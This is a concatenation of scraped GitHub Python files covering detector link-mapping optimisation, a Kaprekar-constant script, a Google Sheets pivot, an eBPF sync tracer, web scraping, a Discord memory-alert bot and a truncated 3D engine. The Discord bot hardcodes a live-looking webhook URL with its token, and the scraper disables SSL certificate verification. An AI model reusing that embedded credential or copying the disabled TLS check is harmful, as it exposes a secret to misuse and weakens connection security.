produce_AllocationFile(MappingFile,allocation,minigroup_type=\"minimal\"):\n\n #Load mapping file\n data = loadDataFile(MappingFile) \n\n #List of which minigroups are assigned to each bundle \n configuration = np.hstack(np.load(allocation,allow_pickle=True))\n\n #Get minigroups\n minigroups,minigroups_swap = getMinilpGBTGroups(data, minigroup_type)\n \n #Bundle together minigroup configuration\n bundles = getBundles(minigroups_swap,configuration)\n\n #Open output file\n fileout = open('allocation_20200729_1.txt', 'w')\n fileout.write( '(lpGBT_number) (number_modules) (sil=0scin=1) (layer) (u/eta) (v/phi) (number_elinks)\\n' )\n for b,bundle in enumerate(bundles):\n fileout.write(str(b) + \"\\n\")\n for minigroup in bundle:\n\n #list lpgbts in minigroup:\n for lpgbt in minigroups_swap[minigroup]:\n fileout.write(str(lpgbt) + \" \")\n \n #Get modules associated to each lpgbt:\n data_list = data[ ((data['TPGId1']==lpgbt) | (data['TPGId2']==lpgbt)) ]\n fileout.write(str(len(data_list)) + \" \")\n for index, row in data_list.iterrows():\n if ( row['density']==2 ):\n fileout.write(\"1 \" + str(row['layer']) + \" \" + str(row['u']) + \" \" + str(row['v']) + \" \" + str(row['TPGeLinkSum']) + \" \" )\n else:\n fileout.write(\"0 \" + str(row['layer']) + \" \" + str(row['u']) + \" \" + str(row['v']) + \" \" + str(row['TPGeLinkSum']) + \" \" )\n fileout.write(\"\\n\")\n \n fileout.close()\n\ndef produce_nTCsPerModuleHists(MappingFile,allocation,CMSSW_ModuleHists,minigroup_type=\"minimal\",correctionConfig=None):\n\n #Load mapping file\n data = loadDataFile(MappingFile) \n\n #List of which minigroups are assigned to each bundle \n configuration = np.hstack(np.load(allocation,allow_pickle=True))\n\n #Get minigroups\n minigroups,minigroups_swap = getMinilpGBTGroups(data, minigroup_type)\n\n #Get list of which modules are in each minigroup\n minigroups_modules = getMiniModuleGroups(data,minigroups_swap)\n \n #Bundle together minigroup configuration\n bundles = getBundles(minigroups_swap,configuration)\n\n #Get nTC hists per module\n module_hists = getModuleTCHists(CMSSW_ModuleHists)\n \n #Open output file\n outfile = ROOT.TFile.Open(\"hists_per_bundle.root\",\"RECREATE\")\n for b,bundle in enumerate(bundles):\n outfile.mkdir(\"bundle_\" + str(b))\n outfile.cd(\"bundle_\" + str(b)) \n for minigroup in bundle:\n\n for module in minigroups_modules[minigroup]:\n\n module_hists[tuple(module)].Write()\n\n outfile.cd()\n\n \ndef check_for_missing_modules_inMappingFile(MappingFile,CMSSW_Silicon,CMSSW_Scintillator):\n\n #Check for modules missing in the mapping file\n \n #Load external data\n data = loadDataFile(MappingFile) #dataframe \n data_tcs_passing,data_tcs_passing_scin = getTCsPassing(CMSSW_Silicon,CMSSW_Scintillator) #from CMSSW\n \n mappingfile_sil = data[data['density']<2][['layer', 'u', 'v']]\n mappingfile_scin = data[data['density']==2][['layer', 'u', 'v']]\n\n cmssw_sil = data_tcs_passing[['u','v','layer','nTCs']]\n cmssw_scin = data_tcs_passing_scin[['u','v','layer','nTCs']]\n\n #onlymapping_sil = mappingfile.merge(cmssw.drop_duplicates(), on=['u','v','layer'],how='left', indicator=True)\n onlycmssw_sil = cmssw_sil.merge(mappingfile_sil.drop_duplicates(), on=['u','v','layer'],how='left', indicator=True)\n onlycmssw_scin = cmssw_scin.merge(mappingfile_scin.drop_duplicates(), on=['u','v','layer'],how='left', indicator=True)\n\n onlycmssw_sil = onlycmssw_sil[onlycmssw_sil['_merge'] == 'left_only']\n onlycmssw_scin = onlycmssw_scin[onlycmssw_scin['_merge'] == 'left_only']\n\n print (\"Silicon\")\n print (onlycmssw_sil[onlycmssw_sil['nTCs']>0][['layer','u','v']].to_string(index=False))\n print (\"Scintillator\")\n print (onlycmssw_scin[onlycmssw_scin['nTCs']>0][['layer','u','v']].to_string(index=False))\n\ndef check_for_missing_modules_inCMSSW(MappingFile,CMSSW_Silicon,CMSSW_Scintillator):\n\n #Load external data\n data = loadDataFile(MappingFile) #dataframe \n data_tcs_passing,data_tcs_passing_scin = getTCsPassing(CMSSW_Silicon,CMSSW_Scintillator) #from CMSSW\n getHexModuleLoadInfo(data,data_tcs_passing,data_tcs_passing_scin,True)\n \n \n\ndef study_mapping(MappingFile,CMSSW_ModuleHists,algorithm=\"random_hill_climb\",initial_state=\"best_so_far\",random_seed=None,max_iterations=100000,output_dir=\".\",print_level=0, minigroup_type=\"minimal\",correctionConfig=None, phisplitConfig=None, chi2Config=None, TowerMappingFile=None):\n\n #Load external data\n data = loadDataFile(MappingFile) #dataframe\n\n try:\n\n #Configuration for how to divide TCs into phidivisionX and phidivisionY (traditionally phi > 60 and phi < 60)\n split = \"per_roverz_bin\"\n phidivisionX_fixvalue_min = 55\n phidivisionY_fixvalue_max = None\n \n if phisplitConfig != None:\n split = phisplitConfig['type']\n if 'phidivisionX_fixvalue_min' in phisplitConfig.keys():\n phidivisionX_fixvalue_min = phisplitConfig['phidivisionX_fixvalue_min']\n if 'phidivisionY_fixvalue_max' in phisplitConfig.keys():\n phidivisionY_fixvalue_max = phisplitConfig['phidivisionY_fixvalue_max']\n\n inclusive_hists,module_hists = getModuleHists(CMSSW_ModuleHists, split = split, phidivisionX_fixvalue_min = phidivisionX_fixvalue_min, phidivisionY_fixvalue_max = phidivisionY_fixvalue_max)\n\n except EnvironmentError:\n print ( \"File \" + CMSSW_ModuleHists + \" does not exist\" )\n exit()\n # Apply various corrections to r/z distributions from CMSSW\n\n if correctionConfig != None:\n print ( \"Applying geometry corrections\" )\n applyGeometryCorrections( inclusive_hists, module_hists, correctionConfig )\n\n include_errors_in_chi2 = False\n include_max_modules_in_chi2 = False\n include_max_towers_in_chi2 = False\n max_modules_weighting_factor = 1000\n if chi2Config != None:\n if 'include_errors_in_chi2' in chi2Config.keys():\n include_errors_in_chi2 = chi2Config['include_errors_in_chi2']\n if 'include_max_modules_in_chi2' in chi2Config.keys():\n include_max_modules_in_chi2 = chi2Config['include_max_modules_in_chi2']\n if 'max_modules_weighting_factor' in chi2Config.keys():\n max_modules_weighting_factor = chi2Config['max_modules_weighting_factor']\n if 'include_max_towers_in_chi2' in chi2Config.keys():\n include_max_towers_in_chi2 = chi2Config['include_max_towers_in_chi2']\n if 'max_modules_weighting_factor' in chi2Config.keys():\n max_towers_weighting_factor = chi2Config['max_towers_weighting_factor']\n\n #Load tower data if required\n if include_max_towers_in_chi2:\n try:\n towerdata = loadModuleTowerMappingFile(TowerMappingFile)\n except EnvironmentError:\n print ( \"File \" + TowerMappingFile + \" does not exist\" )\n exit()\n \n #Form hists corresponding to each lpGBT from module hists\n lpgbt_hists = getlpGBTHists(data, module_hists)\n\n minigroups,minigroups_swap = getMinilpGBTGroups(data, minigroup_type)\n minigroup_hists = getMiniGroupHists(lpgbt_hists,minigroups_swap,return_error_squares=include_errors_in_chi2)\n minigroup_hists_root = getMiniGroupHists(lpgbt_hists,minigroups_swap,root=True)\n #Get list of which modules are in each minigroup\n minigroups_modules = getMiniModuleGroups(data,minigroups_swap)\n\n #Get list of which towers are in each minigroup\n if include_max_towers_in_chi2:\n minigroups_towers = getMiniTowerGroups(towerdata, minigroups_modules)\n\n \n def mapping_max(state):\n global chi2_min\n global combbest\n\n max_modules = None\n max_towers = None\n chi2 = 0\n \n bundles = getBundles(minigroups_swap,state)\n bundled_lpgbthists = getBundledlpgbtHists(minigroup_hists,bundles)\n\n if include_max_modules_in_chi2:\n max_modules = getMaximumNumberOfModulesInABundle(minigroups_modules,bundles)\n if include_max_towers_in_chi2:\n bundled_towers = getTowerBundles(minigroups_towers, bundles)\n max_towers = len(max(bundled_towers,key=len))#Get the length of bundle with the greatest number of towers\n \n chi2 = calculateChiSquared(inclusive_hists,bundled_lpgbthists,max_modules,max_modules_weighting_factor,max_towers,max_towers_weighting_factor)\n\n typicalchi2 = 600000000000\n if include_errors_in_chi2:\n typicalchi2 = 10000000\n if (chi2 0 ):\n print (algorithm,\" \", chi2_min, \" \", chi2_min/typicalchi2)\n if include_max_towers_in_chi2:\n print (\"max_towers = \", max_towers)\n if include_max_modules_in_chi2:\n print (\"max_modules = \", max_modules)\n if ( print_level > 1 ):\n print (repr(combbest))\n\n return chi2\n\n init_state = []\n if (initial_state == \"example\"):\n init_state = example_minigroup_configuration\n if (initial_state[-4:] == \".npy\"):\n print (initial_state)\n init_state = np.hstack(np.load(initial_state,allow_pickle=True))\n if ( len(init_state) != len(minigroups_swap) ):\n print ( \"Initial state should be the same length as the number of mini groups\")\n exit()\n elif (initial_state == \"random\"):\n np.random.seed(random_seed)\n init_state = np.arange(len(minigroups_swap))\n np.random.shuffle(init_state)\n\n \n fitness_cust = mlrose.CustomFitness(mapping_max)\n # Define optimization problem object\n problem_cust = mlrose.DiscreteOpt(length = len(init_state), fitness_fn = fitness_cust, maximize = False, max_val = len(minigroups_swap), minigroups = minigroups_swap)\n\n # Define decay schedule\n schedule = mlrose.ExpDecay()\n #schedule = mlrose.ArithDecay()\n\n filename = \"bundles_job_\"\n filenumber = \"\"\n if ( len(sys.argv) > 2 ):\n filenumber = str(sys.argv[2])\n else:\n filenumber = \"default\"\n filename+=filenumber\n \n if ( algorithm == \"save_root\" ):\n #Save best combination so far into a root file\n bundles = getBundles(minigroups_swap,init_state)\n\n bundled_hists_root = getBundledlpgbtHistsRoot(minigroup_hists_root,bundles)\n bundled_hists = getBundledlpgbtHists(minigroup_hists,bundles)\n\n chi2 = calculateChiSquared(inclusive_hists,bundled_hists)\n newfile = ROOT.TFile(\"lpgbt_10.root\",\"RECREATE\")\n np.save(output_dir + \"/\" + filename + \"_saveroot.npy\",np.array(bundles,dtype=object))\n for sector in bundled_hists_root:\n for key, value in sector.items():\n value.Write()\n for sector in inclusive_hists:\n sector.Scale(1./24.)\n sector.Write()\n newfile.Close()\n print (\"Chi2:\",chi2)\n print (\"List of Bundles:\")\n for b,bundle in enumerate(bundles):\n print (\"\" )\n print (\"bundle\" + str(b) )\n for minigroup in bundle:\n #print (minigroup)\n lpgbts = minigroups_swap[minigroup]\n for lpgbt in lpgbts:\n print (str(lpgbt) + \", \" , end = '')\n\n elif algorithm == \"random_hill_climb\" or algorithm == \"simulated_annealing\":\n\n try:\n if (algorithm == \"random_hill_climb\"):\n best_state, best_fitness = mlrose.random_hill_climb(problem_cust, max_attempts=10000, max_iters=max_iterations, restarts=0, init_state=init_state, random_state=random_seed)\n elif (algorithm == \"simulated_annealing\"):\n best_state, best_fitness = mlrose.simulated_annealing(problem_cust, schedule = schedule, max_attempts = 100000, max_iters = 10000000, init_state = init_state, random_state=random_seed)\n \n\n except ValueError:\n print(\"interrupt received, stopping and saving\")\n\n finally:\n bundles = getBundles(minigroups_swap,combbest)\n np.save(output_dir + \"/\" + filename + \".npy\",np.array(bundles,dtype=object))\n file1 = open(output_dir + \"/chi2_\"+filenumber+\".txt\",\"a\")\n file1.write( \"bundles[\" + filenumber + \"] = \" + str(chi2_min) + \"\\n\" )\n file1.close( )\n\n else:\n print(\"Algorithm \"+ algorithm + \" currently not implemented\" )\n\n \ndef main():\n\n try:\n config_file = sys.argv[1]\n except IndexError:\n print (\"Please give valid config file\")\n exit()\n try:\n with open(config_file,'r') as file:\n config = yaml.load(file,Loader=yaml.FullLoader)\n except EnvironmentError:\n print (\"Please give valid config file\")\n exit()\n\n #Catch possible exceptions from batch system\n signal.signal(signal.SIGINT,handler)\n signal.signal(signal.SIGUSR1,handler)\n signal.signal(signal.SIGXCPU,handler)\n\n ROOT.TH1.SetDefaultSumw2()\n \n if ( config['function']['study_mapping'] ):\n subconfig = config['study_mapping']\n correctionConfig = None\n phisplitConfig = None\n include_errors_in_chi2 = False\n include_max_modules_in_chi2 = False\n if 'corrections' in config.keys():\n correctionConfig = config['corrections']\n if 'chi2' in subconfig.keys():\n chi2Config = subconfig['chi2']\n if 'phisplit' in subconfig.keys():\n phisplitConfig = subconfig['phisplit']\n \n \n study_mapping(subconfig['MappingFile'],subconfig['CMSSW_ModuleHists'],algorithm=subconfig['algorithm'],initial_state=subconfig['initial_state'],random_seed=subconfig['random_seed'],max_iterations=subconfig['max_iterations'],output_dir=config['output_dir'],print_level=config['print_level'],\n minigroup_type=subconfig['minigroup_type'],correctionConfig = correctionConfig,phisplitConfig=phisplitConfig,chi2Config=chi2Config,TowerMappingFile=subconfig['TowerMappingFile']\n )\n\n\n if ( config['function']['check_for_missing_modules'] ):\n subconfig = config['check_for_missing_modules']\n if ( subconfig['inMappingFile'] ):\n print(\"Missing modules in mapping file: \"+ subconfig['MappingFile'] + \"\\n\")\n check_for_missing_modules_inMappingFile(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n if ( subconfig['inCMSSW'] ):\n print(\"\\nMissing modules in CMSSW\\n\")\n check_for_missing_modules_inCMSSW(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n\n if ( config['function']['plot_lpGBTLoads'] ):\n subconfig = config['plot_lpGBTLoads']\n plot_lpGBTLoads(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n\n if ( config['function']['plot_ModuleLoads'] ):\n subconfig = config['plot_ModuleLoads']\n plot_ModuleLoads(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n\n if ( config['function']['plot_ModuleLoads'] ):\n subconfig = config['plot_ModuleLoads']\n plot_ModuleLoads(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n\n if ( config['function']['produce_AllocationFile'] ):\n subconfig = config['produce_AllocationFile']\n produce_AllocationFile(subconfig['MappingFile'],subconfig['allocation'],minigroup_type=subconfig['minigroup_type'])\n\n if ( config['function']['produce_nTCsPerModuleHists'] ):\n subconfig = config['produce_nTCsPerModuleHists']\n produce_nTCsPerModuleHists(subconfig['MappingFile'],subconfig['allocation'],CMSSW_ModuleHists = subconfig['CMSSW_ModuleHists'],minigroup_type=subconfig['minigroup_type'],correctionConfig=None)\n\n \nmain()\n","repo_name":"mhassans/hgcal-linkmapping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"30437321074","text":"\"\"\"\nKaprekar constant/loop (6174) v. 2.2\n\nCoded by Kuba Siekierzynski (c) 2016\nOriginal code:\nhttps://code.sololearn.com/cv426gaf4R5E/#py\n\nnew in v. 2.2:\n- works with really big numbers\n- whole loops are now printed\n- added default value if invalid entry\n \nKaprekar constant/loop algorithm\n(check out my comment on this code for\nmore information on the problem)\n\nThis algorithm should produce 495 for 3-digit\nand 6174 (the original K) for 4-digit numbers.\n\nWorks for all x-digit numbers meeting\nstandard problem criteria. Either finds out\nthe ultimate number or the respective loop\nof numbers.\n\n\"\"\"\n\ntab = []\nloop = 'loop'\n# tab will hold all Kaprekar numbers found\n# loop is just for better wording\n\ndef asc(n):\n # puts the number's digits in ascending...\n return int(''.join(sorted(str(n))))\n\ndef desc(n):\n # ...and descending order\n return int(''.join(sorted(str(n))[::-1]))\n\nn = input(\"Specify a number: \")\ntry:\n n = int(n)\nexcept:\n # assuming n = 2016 to prevent program from crashing\n print(\"\\nInvalid number specified!!!\\nAssuming n = 2016.\")\n n = \"2016\"\nprint(\"\\nTransforming\", str(n) + \":\")\n\nwhile True:\n # iterates, assigns the new diff\n print(desc(n), \"-\", asc(n), \"=\", desc(n)-asc(n))\n n = desc(n) - asc(n)\n\n if n not in tab:\n # checks if already hit that number\n tab.append(n)\n else:\n if tab.index(n) == len(tab)-1:\n # if found as the last, it is a constant...\n tab = []\n tab.append(n)\n loop = 'constant'\n else:\n # ...otherwise it is a loop\n tab = tab[tab.index(n):]\n # strip the first, non-looping items\n break\n\nprint('Kaprekar', loop, 'reached:', tab)\n","repo_name":"kuba-siekierzynski/SoloLearn","sub_path":"Kaprekar.py","file_name":"Kaprekar.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"12818265011","text":"# to count the number of spaces, tabs and new line characters in a given string.\nstring = input(\"String is: \")\n# ,\" \",'\\t','\\n')\n\nspace = 0\ntabs = 0\nnew_line = 0\n\nfor chara in string:\n if(chara == \" \"):\n space +=1\n\n elif(chara == '\\t'):\n tabs += 1\n\n elif(chara== '\\n'):\n new_line += 1\n\n\nprint(\"this is space\",space)\n\nprint(\"this is tabs\",tabs)\n\nprint(\"thos is new line\",new_line)\n","repo_name":"SagarikaNagpal/Python-Practice","sub_path":"QuesOnOops/C-1.py","file_name":"C-1.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34389259380","text":"file = 'gamma.profile'\nsum = 0\nn = 0\nwith open(file, 'r') as fd:\n for i in range(100):\n fd.readline()\n for line in fd:\n l = line.split()\n sum+=float(l[1])\n n+=1\nf = sum/n\n\nprint(f)\n","repo_name":"luishcc/md-projects","sub_path":"tests/energy/readsurf.py","file_name":"readsurf.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14661635844","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com)\n@description: \n\"\"\"\nimport json\nimport os\n\n\ndef load_json(json_path, encoding='utf-8'):\n \"\"\"\n Loads a json args from a file.\n \"\"\"\n assert os.path.exists(json_path), \"Json file %s not found\" % json_path\n with open(json_path, 'r', encoding=encoding) as f:\n json_config = f.read()\n try:\n config = json.loads(json_config)\n except BaseException as err:\n raise Exception(\"Failed to validate args with error: %s\" % str(err))\n\n return config\n\n\ndef save_json(data, json_path, mode='w', encoding='utf-8'):\n dir = os.path.dirname(os.path.abspath(json_path))\n if not os.path.exists(dir):\n print(dir)\n os.makedirs(dir)\n with open(json_path, mode=mode, encoding=encoding) as f:\n f.write(json.dumps(data, ensure_ascii=False, indent=4))\n\n\ndef recursive_glob(rootdir=\".\", suffix=\"\"):\n \"\"\"Performs recursive glob with given suffix and rootdir\n :param rootdir is the root directory\n :param suffix is the suffix to be searched\n \"\"\"\n return [\n os.path.join(looproot, filename)\n for looproot, _, filenames in os.walk(rootdir)\n for filename in filenames\n if filename.endswith(suffix)\n ]\n\n\nif __name__ == '__main__':\n p = '../configs/resnet50_imagenet_classy_config.json'\n a = load_json(p)\n print(a)\n with open(p) as f:\n b = json.load(f)\n print(b)","repo_name":"shibing624/cvnet","sub_path":"cvnet/utils/io_utils.py","file_name":"io_utils.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"35590989857","text":"#!/usr/bin/env python3\nfrom bcc import BPF\n\nb = BPF(src_file=\"sync_perf_output.c\")\nb.attach_kprobe(event=b.get_syscall_fnname(\"sync\"), fn_name=\"hello\")\n\nprint(\"Tracing for quick sync's... Ctrl-C to end\")\n\nstart = 0\n\n\ndef print_event(cpu, data, size):\n global start\n event = b[\"events\"].event(data)\n\n if start == 0:\n start = int(event.time)\n start_time = (int(event.time) - start) / 1000000\n\n print(\"[PID:%6s] At time %d ms: multiple syncs detected, last %s ms ago\" % (\n event.pid, start_time, event.delta))\n\n\nb[\"events\"].open_perf_buffer(print_event)\n\nwhile 1:\n try:\n b.perf_buffer_poll()\n except KeyboardInterrupt:\n exit()\n","repo_name":"w01fb0ss/my_bpf_study","sub_path":"bcc/sync_perf_output.py","file_name":"sync_perf_output.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"44979283533","text":"# google cloud platform\nimport gspread\nfrom google.oauth2.service_account import Credentials\nimport os\nfrom dotenv import load_dotenv\nimport pandas as pd\nfrom gspread_dataframe import set_with_dataframe\nfrom gspread_formatting import *\n\nload_dotenv()\n\nscopes = [\n 'https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive'\n]\n\ncredentials = Credentials.from_service_account_file(\n './section6/secret.json',\n scopes=scopes\n)\n\ngc = gspread.authorize(credentials)\n# print(gc)\n\n\nSP_SHEET_KEY = os.environ['SP_SHEET_KEY']\nSP_SHEET = 'demo'\n\nsh = gc.open_by_key(SP_SHEET_KEY)\n# print(sh)\nworksheet = sh.worksheet(SP_SHEET)\n# print(worksheet)\ndata = worksheet.get_all_values()\n# print(data)\ndf = pd.DataFrame(data[2:], columns=data[1])\ndf = df.drop(df.columns[[0]], axis=1)\n# print(df)\n# print(df.dtypes)\ndf = df.astype({'年齢': int, '社員ID': int})\n# print(df.dtypes)\npvt_table = df.pivot_table(index=['所属'], values=['年齢'], aggfunc='mean')\n# print(pvt_table)\npvt_table['年齢'] = pvt_table['年齢'].round()\n# print(pvt_table)\nnew_worksheet = sh.add_worksheet(title='new', rows=100, cols=100)\n# print(new_worksheet)\nfirst_row = 2\nfirst_col = 2\nset_with_dataframe(new_worksheet, pvt_table.reset_index(),\n row=first_row, col=first_col)\n\nheader_range = 'B2:C2'\nindex_range = 'B3:B8'\nvalue_range = 'C3:C8'\n\nheader_fmt = cellFormat(\n backgroundColor=color(38/255, 166/255, 154/255),\n textFormat=textFormat(\n bold=True, foregroundColor=color(255/255, 255/255, 255/255)),\n horizontalAlignment='CENTER'\n)\n\nformat_cell_range(new_worksheet, header_range, header_fmt)\n\nborder = Border('SOLID', Color(0, 0, 0, 0))\nfmt = CellFormat(borders=Borders(\n top=border, bottom=border, left=border, right=border))\nformat_cell_range(new_worksheet, header_range, fmt)\nformat_cell_range(new_worksheet, index_range, fmt)\nformat_cell_range(new_worksheet, value_range, fmt)\n","repo_name":"kyjp/api_python","sub_path":"section6/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9269665429","text":"import yfinance as yf\nimport pandas as pd\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nimport numpy as np\n\npd.options.mode.chained_assignment = None\n\nticker = 'KWEB'\nend = datetime.date.today().strftime(\"%Y-%m-%d\")\nstart = datetime.date.today() + relativedelta(years=-1)\nstart = start.strftime(\"%Y-%m-%d\")\n\nohlc = pd.DataFrame()\nohlc['Adj Close'] = yf.download(ticker, start, end)['Adj Close']\nprint(ohlc)\n\nprint(ohlc)\nohlc['returns'] = np.log(ohlc/ohlc.shift(-1))\nprint(ohlc['returns'])\nwindow_len = int(len(ohlc) / 2)\nprint(window_len)\n\ngh = ohlc['returns'].rolling(window_len).std()*(252**0.5)\nprint(gh)\n\n\ndays_10 = ohlc['Adj Close'][-10:]\nret_10 = np.log(days_10/days_10.shift(-1))\ndaily_std_10 = np.std(ret_10)\nstd_10 = daily_std_10 * 252 ** .5\nstd_10 = round(std_10 * 100, 2)\nprint(std_10)\nprint(round(gh.min() * 100, 2))\n","repo_name":"Badchaos11/fin_bot","sub_path":"develop/china_2.py","file_name":"china_2.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37525126880","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys # Permet capturar els paràmetres de la línia de comandes\nimport requests # Enviar peticions HTTP de forma sencilla\nimport json # Codificar en format JSON\n\n__author__ = \"Unai Cervantes\"\n__email__ = \"cf19unai.cervantes@iesjoandaustria.org\"\n__license__ = \"GPL V3\"\n\n\"\"\"\nEnviarà un missatge a discord si la memòria disponible es inferior a la meitat.\n\"\"\"\nganxo = 'https://discord.com/api/webhooks/976504155092975687/fqEOMfHAnmLh3xZ6_22lZTWEt31Otl7lk32dzeD2luYtqb8OfBg3wBqc9KXi4H1A8JOZ'\n\n\ndef llegir_dades():\n with open(\"/proc/meminfo\") as memoria:\n total = memoria.readline()\n total = elimina_frase(total,\"MemTotal:\")\n lliure = memoria.readline()\n lliure = elimina_frase(lliure,\"MemFree:\")\n disponible = memoria.readline()\n disponible = elimina_frase(disponible,\"MemAvailable:\")\n \n return total,lliure,disponible\n\n\ndef elimina_frase(cadena,eliminar):\n cadena = cadena.replace(eliminar,\"\")\n cadena = cadena.replace(\"kB\",\"\")\n cadena = cadena.strip()\n return cadena\n\ndef comprova_memoria():\n total,lliure,disponible =llegir_dades()\n if int(lliure)/int(total) < 0.5:\n return True\n return False\n\ndef main(ganxo):\n missatge = \"La memòria es inferior a la meitat\"\n resultat = \"[X] Alguna cosa ha anat malament! :( \"\n capcaleres = {'Content-Type': 'application/json'}\n carrega = {\"content\": missatge}\n if comprova_memoria() == True:\n resposta = requests.post(\n ganxo, \n data=json.dumps(carrega), \n headers=capcaleres\n )\n if resposta.ok:\n resultat = \"Missatge enviat\"\n else:\n resultat = \"La memòria no supera la meitat d'utilització.\"\n return resultat\n\n\nif __name__ == \"__main__\":\n print(main(ganxo))","repo_name":"unaicervantes/ProgramacionASIX_CervantesUnai","sub_path":"Estructures/Exercicis/bot_informacio_CerevantesUnai.py","file_name":"bot_informacio_CerevantesUnai.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6216133450","text":"from urllib.request import urlopen\r\nimport ssl\r\nfrom bs4 import BeautifulSoup\r\n\r\n#Ignore SSL certificate errors\r\nctx = ssl.create_default_context()\r\nctx.check_hostname = False\r\nctx.verify_mode = ssl.CERT_NONE\r\n\r\ndef FindName():\r\n\r\n url = 'http://py4e-data.dr-chuck.net/known_by_Martin.html'\r\n html = urlopen(url,context = ctx).read()\r\n soup = BeautifulSoup(html,'html.parser')\r\n\r\n #retrieves names by following the steps below\r\n tags = soup('a')\r\n j = 0\r\n for j in range(7):\r\n c = 0\r\n for tag in tags:\r\n c+= 1\r\n if(c == 18):\r\n url= tag.get('href',None)\r\n html= urlopen(url,context= ctx).read()\r\n soup= BeautifulSoup(html,'html.parser')\r\n tags = soup('a')\r\n break\r\n print(tag.contents[0])\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n FindName()\r\n\r\n\r\n","repo_name":"saket2508/Coursera_pyWebData","sub_path":"urllibFindName.py","file_name":"urllibFindName.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3736120144","text":"from imported_libs import *\r\n\r\npygame.init()\r\npygame.display.set_caption('3D Engine')\r\n#screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\r\n#w, h = screen.get_size()\r\nscreen = pygame.display.set_mode((500, 500))\r\nw, h = 500, 500\r\ncx, cy = int(w / 2), int(h / 2)\r\nclock = pygame.time.Clock()\r\nfov = 90\r\n\r\nverts = []\r\nfaces = []\r\n\r\nfilepath = 'objects/pokus3.obj'\r\nwith open(filepath) as fp:\r\n line = fp.readline()\r\n cnt = 1\r\n while line:\r\n a = line.strip().split(\" \")\r\n\r\n if a[0] == \"v\":\r\n v = [float(a[1]), float(a[2]), float(a[3])]\r\n verts.append(v)\r\n\r\n elif a[0] == \"f\":\r\n f = [float(a[1]), float(a[2]), float(a[3])]\r\n faces.append(f)\r\n\r\n line = fp.readline()\r\n cnt += 1\r\n\r\nclass Shape():\r\n\r\n def __init__(self):\r\n t = np.zeros((len(faces), 3, 4))\r\n for i in range(len(faces)):\r\n v1 = verts[int(faces[i][0] - 1)] + [1]\r\n v2 = verts[int(faces[i][1] - 1)] + [1]\r\n v3 = verts[int(faces[i][2] - 1)] + [1]\r\n t[i][0] = v1\r\n t[i][1] = v2\r\n t[i][2] = v3\r\n self.triangles = t\r\n\r\n\r\nclass Camera():\r\n\r\n def __init__(self):\r\n self.pos = np.array([0, 0, 0])\r\n self.dir = np.array([0, 0, 1])\r\n self.yaw = 0\r\n\r\n def update(self, key, dt):\r\n\r\n forward = np.dot(camera.dir, 8*dt)\r\n if key[pygame.K_w]:\r\n self.pos = np.add(self.pos, forward)\r\n\r\n if key[pygame.K_s]:\r\n self.pos = np.subtract(self.pos, forward)\r\n\r\n if key[pygame.K_a]:\r\n self.yaw -= 2*dt\r\n\r\n if key[pygame.K_d]:\r\n self.yaw += 2*dt\r\n\r\n\r\ncamera = Camera()\r\nshape = Shape()\r\n\r\nz1 = 0.1\r\nz2 = 1000\r\nr = h / w\r\nf = 1 / tan(radians(fov / 2))\r\n\r\nprojection = np.array([[r * f, 0, 0, 0],\r\n [0, f, 0, 0],\r\n [0, 0, z2 / (z2 - z1), 1],\r\n [0, 0, (-z1 * z2) / (z2 - z1), 0]])\r\n\r\ntheta = 0\r\nrunning = True\r\nwhile running:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: pygame.quit(); sys.exit(); running = False\r\n if event.type == pygame.KEYDOWN:\r\n global_key = pygame.key.get_pressed()\r\n if global_key[pygame.K_ESCAPE]:\r\n running = False\r\n pygame.quit()\r\n sys.exit()\r\n\r\n screen.fill((0, 0, 0))\r\n\r\n rotation_Z = rotate_Z(theta)\r\n rotation_X = rotate_X(0)\r\n rotation_Y = rotate_Y(3/2*pi + theta)\r\n\r\n theta += 0.02\r\n\r\n dt = clock.tick() / 1000\r\n key = pygame.key.get_pressed()\r\n camera.update(key, dt)\r\n\r\n Up = np.array([0, 1, 0])\r\n FW = np.array([0,0,1])\r\n camera_rotation = rotate_Y_3(camera.yaw)\r\n camera.dir = np.dot(camera_rotation, FW)\r\n FW = np.add(camera.pos, camera.dir)\r\n\r\n camera_matrix = matrix_pointat(camera.pos, FW, Up)\r\n #view_matrix = 